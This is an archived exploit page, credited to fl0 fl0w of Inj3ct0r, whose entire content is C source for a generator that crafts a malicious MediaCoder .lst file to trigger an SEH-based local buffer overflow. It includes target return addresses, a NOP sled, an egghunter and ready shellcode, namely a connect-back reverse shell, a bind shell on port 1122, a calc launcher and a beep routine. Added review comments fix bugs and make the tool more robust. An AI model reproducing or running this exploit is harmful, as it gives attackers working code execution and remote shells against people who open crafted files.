
MediaCoder (.lst) file local Buffer Overflow Exploit

Posted on 18 March 2010

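/*
 * ====================================================
 *  MediaCoder (.lst) file local Buffer Overflow Exploit
 * ====================================================
 * Archived from Inj3ct0r.com (support e-mail: submit[at]inj3ct0r.com),
 * "I'm fl0 fl0w member from Inj3ct0r Team".  Discovered By: fl0 fl0w.
 *
 * What this program is: a generator that writes a .lst file with the layout
 *
 *   [0x2FC alphanumeric filler][nSEH jmp][SEH handler addr][0x14 NOPs]
 *   [32-byte egghunter][18 zero bytes][0x4D2 'X'][8-byte tag][shellcode]
 *
 * and nothing more.  How MediaCoder 0.7.3 consumes the file is not part of
 * this listing; only the target version string (VER) and the per-target SEH
 * handler addresses were shipped with it, and neither is verified here.
 *
 * NOTE(review): the archived copy had every backslash stripped, so "\x90" had
 * become "x90" and all line breaks were lost.  The escapes below are restored
 * from context: the original's own size constants (0x14 NOPs, 0x20-byte
 * egghunter, 0x2C5-byte bind shell, 0x20-byte calc) match the byte counts only
 * with "\x" restored, and the compile-time checks further down pin that.  The
 * shellcode bytes are reproduced unchanged and are NOT vouched for -- they were
 * posted in 2010 for Windows XP.
 *
 * Fixes to the generator itself (the produced file is byte-identical for the
 * paths that used to work):
 *  - mcpy() ignored its length argument and used strlen(source), so the BeeP
 *    payload was cut at its first 0x00 byte (19 of 35 bytes; the original's
 *    0x13 constant is exactly that strlen result) and the 4-byte SEH address
 *    copy read past `ret`.  Every copy now has an explicit length.
 *  - argument errors printed a message but fell through into atoi(NULL) and
 *    an uninitialised return address; validation now exits with status 1.
 *  - the custom-address check looped over argv[1] instead of argv[7], only
 *    kept the result for the last character and never used it; replaced by a
 *    strict "0x" + 8 hex digit parser.
 *  - fopen/fwrite/fclose were unchecked and getFsize() leaked its FILE*.
 *  - help text said .m3u, "[1,5]" for four shellcodes, and the custom-target
 *    example omitted "-t 4".
 *  - system("cls") and the unused <windows.h>/<getopt.h> are gone; this is
 *    plain C11 now.  Output is serialised little-endian explicitly instead of
 *    memcpy'ing a host DWORD, so a non-x86 build host still emits the same
 *    bytes.
 */
#include <ctype.h>
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define VER     "0.7.3 build 4612 PSP edition"
#define POCNAME "MediaCoder .lst file local buffer overflow exploit"
#define AUTHOR  "fl0 fl0w"

/* File layout.  Values are exactly those of the original listing. */
enum {
    RANDOM_LEN       = 0x2FC,  /* String_lengh: leading alphanumeric filler */
    NSEH_OFFSET      = 0x2FC,  /* next-SEH record: short jmp over the handler */
    EIP_OFFSET       = 0x300,  /* SEH handler address, chosen per target */
    NOP_OFFSET       = 0x304,
    NOP_LEN          = 0x14,
    EGGHUNTER_OFFSET = 0x318,
    JUNK_OFFSET      = 0x34A,  /* 0x338..0x349 is left as zero bytes, see build_file() */
    JUNK_LEN         = 0x4D2,
    TAG_OFFSET       = 0x81C,
    SHELL_OFFSET     = 0x824,
    SHELL_MAX        = 0x3E8,  /* size of the original shellbuffer[] */
    FILE_MAX         = SHELL_OFFSET + SHELL_MAX
};

/* nSEH: "jmp short +6" over the 4-byte handler address into the NOP sled. */
static const char nseh_jmp[] = "\xEB\x06\x90\x90";

/*
 * SEH handler address per target (index = -t value; 4 is read from argv).
 * Written little-endian, i.e. the same bytes the original memcpy'd:
 *   1 "Universal"                 \x26\x59\x01\x66
 *   2 Windows XP SP2 en kernel32  \xB8\x15\xD1\x72
 *   3 Windows SP3 en ntdll        \x83\x27\x90\x7C
 * Presumably pop/pop/ret gadgets (the listing declared an unused
 * Findpopopret() helper) -- verify against the actual module before use.
 */
static const uint32_t target_ret[] = { 0, 0x66015926u, 0x72D115B8u, 0x7C902783u };

/* "BeeP": 35 bytes, contains 0x00 bytes.  Calls a hard-coded absolute address
 * (0x7C837A6F) -- only meaningful on the one build it was taken from. */
static const char BeeP[] =
    "\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC"
    "\x6F\x7A\x83\x7C"
    "\xC7\x44\x24\x04\xD0\x07\x00\x00\xC7\x04\x24"
    "\x01\x0E\x00\x00\x8B\x45\xFC\xFF\xD0\xC9\xC3";

/* ConnectBack 127.0.0.1 port 2010 (as labelled in the original; encoded). */
static const char ConnectBack[] =
    "\x31\xc9\xbd\xcb\xe3\xbf\xf7\xb1\x4f\xd9\xc8\xd9\x74\x24\xf4"
    "\x5f\x31\x6f\x10\x83\xc7\x04\x03\x6f\x0c\x29\x16\x43\x1f\x24"
    "\xd9\xbc\xe0\x56\x53\x59\xd1\x44\x07\x29\x40\x58\x43\x7f\x69"
    "\x13\x01\x94\xfa\x51\x8e\x9b\x4b\xdf\xe8\x92\x4c\xee\x34\x78"
    "\x8e\x71\xc9\x83\xc3\x51\xf0\x4b\x16\x90\x35\xb1\xd9\xc0\xee"
    "\xbd\x48\xf4\x9b\x80\x50\xf5\x4b\x8f\xe9\x8d\xee\x50\x9d\x27"
    "\xf0\x80\x0e\x3c\xba\x38\x24\x1a\x1b\x38\xe9\x79\x67\x73\x86"
    "\x49\x13\x82\x4e\x80\xdc\xb4\xae\x4e\xe3\x78\x23\x8f\x23\xbe"
    "\xdc\xfa\x5f\xbc\x61\xfc\x9b\xbe\xbd\x89\x39\x18\x35\x29\x9a"
    "\x98\x9a\xaf\x69\x96\x57\xa4\x36\xbb\x66\x69\x4d\xc7\xe3\x8c"
    "\x82\x41\xb7\xaa\x06\x09\x63\xd3\x1f\xf7\xc2\xec\x40\x5f\xba"
    "\x48\x0a\x72\xaf\xea\x51\x1b\x1c\xc0\x69\xdb\x0a\x53\x19\xe9"
    "\x95\xcf\xb5\x41\x5d\xc9\x42\xa5\x74\xad\xdd\x58\x77\xcd\xf4"
    "\x9e\x23\x9d\x6e\x36\x4c\x76\x6f\xb7\x99\xd8\x3f\x17\x72\x98"
    "\xef\xd7\x22\x70\xfa\xd7\x1d\x60\x05\x32\x28\xa7\x92\xc2\x2b"
    "\x27\x62\x55\x2e\x27\x63\x7f\xa7\xc1\x01\x6f\xee\x5a\xbe\x16"
    "\xab\x10\x5f\xd6\x61\xb0\xfc\x45\xee\x40\x8a\x75\xb9\x17\xdb"
    "\x48\xb0\xfd\xf1\xf3\x6a\xe3\x0b\x65\x54\xa7\xd7\x56\x5b\x26"
    "\x95\xe3\x7f\x38\x63\xeb\x3b\x6c\x3b\xba\x95\xda\xfd\x14\x54"
    "\xb4\x57\xca\x3e\x50\x21\x20\x81\x26\x2e\x6d\x77\xc6\x9f\xd8"
    "\xce\xf9\x10\x8d\xc6\x82\x4c\x2d\x28\x59\xd5\x5d\x63\xc3\x7c"
    "\xf6\x2a\x96\x3c\x9b\xcc\x4d\x02\xa2\x4e\x67\xfb\x51\x4e\x02"
    "\xfe\x1e\xc8\xff\x72\x0e\xbd\xff\x21\x2f\x94";

/* Bindport1122 (original label; body is alphanumeric-encoded), 0x2C5 bytes. */
static const char Bindport1122[] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
    "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
    "\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x37"
    "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"
    "\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
    "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
    "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x33\x46\x45\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48"
    "\x4f\x55\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x44"
    "\x4b\x58\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
    "\x49\x38\x4e\x36\x46\x52\x4e\x41\x41\x56\x43\x4c\x41\x33\x4b\x4d"
    "\x46\x56\x4b\x38\x43\x34\x42\x53\x4b\x38\x42\x44\x4e\x30\x4b\x48"
    "\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x34\x4a\x30\x50\x45\x4a\x46"
    "\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
    "\x43\x55\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57"
    "\x44\x43\x4f\x45\x46\x35\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
    "\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"
    "\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x56\x44\x30"
    "\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55"
    "\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44"
    "\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x46\x50"
    "\x44\x36\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a"
    "\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
    "\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
    "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d"
    "\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x55\x4f\x4f\x48\x4d"
    "\x42\x55\x46\x35\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
    "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x35"
    "\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x56"
    "\x4d\x36\x49\x38\x45\x4e\x4c\x36\x42\x35\x49\x45\x49\x32\x4e\x4c"
    "\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c"
    "\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x54\x4e\x52"
    "\x43\x39\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
    "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
    "\x48\x4d\x4b\x45\x47\x55\x44\x45\x41\x45\x41\x35\x41\x45\x4c\x56"
    "\x41\x50\x41\x45\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x36"
    "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
    "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
    "\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
    "\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a";

/* Calculator: 0x20 bytes; pushes "calc" and calls two hard-coded absolute
 * addresses (0x77F8AA4C, 0x77C293C7) -- build-specific like BeeP. */
static const char Calculator[] =
    "\xba\x20\xf0\xfd\x7f\xc7\x02\x4c\xaa\xf8\x77\x33\xC0\x50\x68\x63\x61\x6C\x63"
    "\x54\x5B\x50\x53\xB9\xC7\x93\xC2\x77\xFF\xD1\xEB\xF7";

/*
 * Egghunter, 32 bytes, searching for the doubled tag "fl0wfl0w" and jumping
 * to it.  The original labelled it "IsBadReadPtr"; the bytes however do
 * push 2 / pop eax / int 2e (\x6A\x02\x58\xCD\x2E), i.e. the syscall-based
 * variant rather than the IsBadReadPtr one -- verify before relying on the
 * label.  \xB8 "fl0w" loads the tag, the two \xAF (scasd) compare it twice.
 */
static const char egghunter[] =
    "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
    "\x66\x6C\x30\x77"   /* fl0w tag */
    "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

/* Tag the egghunter looks for: "fl0w" twice, placed right before the shellcode. */
static const char tag[] = "\x66\x6C\x30\x77" "\x66\x6C\x30\x77";

/* Pin the restored byte counts to the constants the original shipped with. */
_Static_assert(sizeof egghunter - 1 == 0x20, "egghunter must be 32 bytes");
_Static_assert(sizeof tag - 1 == 8, "tag must be 8 bytes");
_Static_assert(sizeof Bindport1122 - 1 == 0x2C5, "Bindport1122 must be 0x2C5 bytes");
_Static_assert(sizeof Calculator - 1 == 0x20, "Calculator must be 0x20 bytes");
_Static_assert(NOP_OFFSET + NOP_LEN == EGGHUNTER_OFFSET, "NOP sled must end at the egghunter");
_Static_assert(EGGHUNTER_OFFSET + 0x20 <= JUNK_OFFSET, "egghunter must fit before the filler");
_Static_assert(JUNK_OFFSET + JUNK_LEN == TAG_OFFSET, "filler must end at the tag");
_Static_assert(TAG_OFFSET + 8 == SHELL_OFFSET, "tag must end at the shellcode");
_Static_assert(sizeof Bindport1122 - 1 <= SHELL_MAX && sizeof ConnectBack - 1 <= SHELL_MAX,
               "shellcode must fit the shell buffer");

/* "[*]msg" -- the original's print() wrapper. */
static void print(const char *msg)
{
    printf("[*]%s\n", msg);
}

/* Fill s[0..len) with alphanumeric filler.  rand() is deliberately left
 * unseeded, as in the original, so a given command line always produces the
 * same file (useful when diffing crashes). */
static void gen_random(unsigned char *s, size_t len)
{
    static const char alphanum[] =
        "0123456789ABCDEFGHIJKLMNOPQRST"
        "UVWXYZabcdefghijklmnopqrstuvwxyz";

    for (size_t i = 0; i < len; i++)
        s[i] = (unsigned char)alphanum[rand() % (sizeof alphanum - 1)];
}

/* Store v at p in little-endian byte order (x86 target, any build host). */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xFF);
    p[1] = (unsigned char)((v >> 8) & 0xFF);
    p[2] = (unsigned char)((v >> 16) & 0xFF);
    p[3] = (unsigned char)((v >> 24) & 0xFF);
}

/*
 * Lay out the .lst file in buf (at least FILE_MAX bytes) and return its
 * length.  `shell`/`shell_len` must be at most SHELL_MAX bytes.
 */
static size_t build_file(unsigned char *buf, uint32_t ret,
                         const char *shell, size_t shell_len)
{
    memset(buf, 0, FILE_MAX);
    gen_random(buf, RANDOM_LEN);
    memcpy(buf + NSEH_OFFSET, nseh_jmp, sizeof nseh_jmp - 1);
    put_le32(buf + EIP_OFFSET, ret);
    memset(buf + NOP_OFFSET, 0x90, NOP_LEN);
    memcpy(buf + EGGHUNTER_OFFSET, egghunter, sizeof egghunter - 1);
    /* 0x338..0x349 (18 bytes) is never written: the original left it as the
     * zero bytes of its zero-initialised global buffer, so it stays 0x00 here
     * too to keep the file layout identical. */
    memset(buf + JUNK_OFFSET, 'X', JUNK_LEN);
    memcpy(buf + TAG_OFFSET, tag, sizeof tag - 1);
    memcpy(buf + SHELL_OFFSET, shell, shell_len);
    return SHELL_OFFSET + shell_len;
}

/* Parse a decimal integer in [lo, hi]; rejects trailing garbage and overflow
 * (the original's atoi() silently accepted "2x" and out-of-range values). */
static int parse_int(const char *s, int lo, int hi, int *out)
{
    char *end;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE || v < lo || v > hi)
        return 0;
    *out = (int)v;
    return 1;
}

/* Parse exactly "0x" followed by 8 hex digits into a 32-bit address. */
static int parse_hex32(const char *s, uint32_t *out)
{
    if (strlen(s) != 10 || strncmp(s, "0x", 2) != 0)
        return 0;
    for (int i = 2; i < 10; i++)
        if (!isxdigit((unsigned char)s[i]))
            return 0;
    char *end;
    errno = 0;
    unsigned long v = strtoul(s + 2, &end, 16);
    if (errno == ERANGE || end != s + 10 || v > 0xFFFFFFFFul)
        return 0;
    *out = (uint32_t)v;
    return 1;
}

/*
 * Validate the command line:  -f <file> -s <1..4> -t <1..4> [0xADDRESS]
 * The flags must appear in exactly those positions (as in the original).
 * Target 4 needs the 8th argument; for targets 1-3 an 8th argument is ignored,
 * which the original also allowed.  Returns 1 on success.
 */
static int parse_args(int argc, char **argv, int *shell_no, int *target, uint32_t *ret)
{
    if (argc != 7 && argc != 8)
        return 0;
    if (strcmp(argv[1], "-f") != 0 || strcmp(argv[3], "-s") != 0 || strcmp(argv[5], "-t") != 0)
        return 0;
    if (!parse_int(argv[4], 1, 4, shell_no)) {
        print("syntax error ,shellcode must be in range[1-4]");
        return 0;
    }
    if (!parse_int(argv[6], 1, 4, target)) {
        print("syntax error ,target must be in range[1-4]");
        return 0;
    }
    if (*target == 4) {
        if (argc != 8 || !parse_hex32(argv[7], ret)) {
            print("syntax error 0x not found");
            return 0;
        }
    } else {
        *ret = target_ret[*target];
    }
    return 1;
}

/* Usage banner.  Rows are padded with printf so the box stays aligned. */
static void help(void)
{
    static const char stars[] =
        "***************************************************************************";
    static const char *const rows[] = {
        "syntax: -f <file.lst> -s <shellcode> -t <target> [0xFFFFFFFF]",
        "  -f filename",
        "  -s shellcode to run [1,4]",
        "  -t target [1,4]  (target 4 takes the SEH handler address as 0x........)",
        "example: mediac.exe -f vuln.lst -s 2 -t 1",
        "         mediac.exe -f vuln.lst -s 4 -t 4 0xFFFFFFFF",
        "Shellcode 1.ConnectBack 127.0.0.1 port 2010",
        "          2.Bindport1122",
        "          3.Calculator",
        "          4.BeeP",
        "Targets   1.Universal",
        "          2.Windows xp sp2 en kernel32.dll",
        "          3.Windows sp3 en ntdll.dll",
        "          4.Windows xp sp1 en (address from the command line)",
    };

    puts(stars);
    for (size_t i = 0; i < sizeof rows / sizeof rows[0]; i++)
        printf("* %-71s *\n", rows[i]);
    puts(stars);
}

/* Size of the file at `path` in bytes, or -1 (with a message) on error.
 * Unlike the original getFsize(), the handle is always closed. */
static long file_size(const char *path)
{
    FILE *g = fopen(path, "rb");
    if (g == NULL) {
        print("File error at reading");
        return -1;
    }
    long s = -1;
    if (fseek(g, 0, SEEK_END) == 0)
        s = ftell(g);
    fclose(g);
    return s;
}

int main(int argc, char **argv)
{
    int shell_no = 0, target = 0;
    uint32_t ret = 0;

    if (!parse_args(argc, argv, &shell_no, &target, &ret)) {
        printf("[#]%s\n[#]Ver %s\n[#]Author %s\n", POCNAME, VER, AUTHOR);
        help();
        return 1;
    }

    const char *shell = NULL;
    size_t shell_len = 0;
    switch (shell_no) {
    case 1: shell = ConnectBack;  shell_len = sizeof ConnectBack - 1;  break;
    case 2: shell = Bindport1122; shell_len = sizeof Bindport1122 - 1; break;
    case 3: shell = Calculator;   shell_len = sizeof Calculator - 1;   break;
    case 4: shell = BeeP;         shell_len = sizeof BeeP - 1;         break;
    default:
        print("syntax error ,shellcode must be in range[1-4]");
        return 1;
    }
    if (shell_len > SHELL_MAX) {   /* cannot happen (static asserts), kept as a guard */
        print("shellcode too large");
        return 1;
    }

    static unsigned char fbuffer[FILE_MAX];
    size_t total = build_file(fbuffer, ret, shell, shell_len);

    FILE *f = fopen(argv[2], "wb");
    if (f == NULL) {
        perror(argv[2]);
        return 1;
    }
    if (fwrite(fbuffer, 1, total, f) != total) {
        perror("fwrite");
        fclose(f);
        return 1;
    }
    if (fclose(f) != 0) {   /* fclose flushes; a failure here means a short file */
        perror("fclose");
        return 1;
    }

    print("DONE!");
    printf("[!]File is %ld bytes\n", file_size(argv[2]));
    getchar();   /* PAUSE() in the original: keep the console window open */
    return 0;
}

/* # ~ - [ [ : Inj3ct0r : ] ] */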

 

